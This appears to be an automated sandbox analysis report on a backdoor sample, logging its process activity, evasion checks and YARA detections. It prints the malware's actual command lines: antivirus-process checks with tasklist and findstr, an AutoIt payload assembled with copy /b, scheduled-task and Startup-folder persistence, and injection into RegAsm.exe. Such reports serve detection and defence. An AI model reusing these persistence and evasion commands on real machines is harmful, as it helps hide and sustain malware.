              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeMemory allocated: 2B70000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeMemory allocated: 2D10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeMemory allocated: 4D10000 memory reserve | memory write watch
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifWindow / User API: threadDelayed 5579Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\NortheastJump to dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifAPI coverage: 4.9 %
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528Thread sleep count: 5579 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528Thread sleep time: -55790s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifThread sleep count: Count: 5579 delay: -10Jump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_00406850 FindFirstFileW,FindClose,0_2_00406850
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C26
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_004AE472
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004AD921
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004ADC54
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004BA087
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004BA1E2
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_004BA570
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0047C622 FindFirstFileExW,11_2_0047C622
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,11_2_004B66DC
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B7333 FindFirstFileW,FindClose,11_2_004B7333
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_004B73D4
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00445FC8
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: Telecom.pif, 0000000B.00000002.2443431960.0000000003ABB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeAPI call chain: ExitProcess graph end nodegraph_0-3390
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BF4FF BlockInput,11_2_004BF4FF
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_0044338B
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00445FC8
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00465058 mov eax, dword ptr fs:[00000030h]11_2_00465058
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_004A20AA
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00472992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00472992
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00460BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00460BAF
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00460D45 SetUnhandledExceptionFilter,11_2_00460D45
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00460F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00460F91
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000Jump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: D7D000Jump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_004A1B4D
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_0044338B
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004ABBED SendInput,keybd_event,11_2_004ABBED
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004AEC6C mouse_event,11_2_004AEC6C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\RJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\RJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /FJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exitJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_004A14AE
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_004A1FB0
              Source: Telecom.pif, 0000000B.00000003.1222451762.00000000044C9000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmp, EcoScape.pif, 00000013.00000002.1246780607.0000000000503000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: Telecom.pifBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00460A08 cpuid 11_2_00460A08
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0049E5F4 GetLocalTime,11_2_0049E5F4
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0049E652 GetUserNameW,11_2_0049E652
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0047BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_0047BCD2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR
              Source: Telecom.pifBinary or memory string: WIN_81
              Source: Telecom.pifBinary or memory string: WIN_XP
              Source: Commander.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: Telecom.pifBinary or memory string: WIN_XPe
              Source: Telecom.pifBinary or memory string: WIN_VISTA
              Source: Telecom.pifBinary or memory string: WIN_7
              Source: Telecom.pifBinary or memory string: WIN_8

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
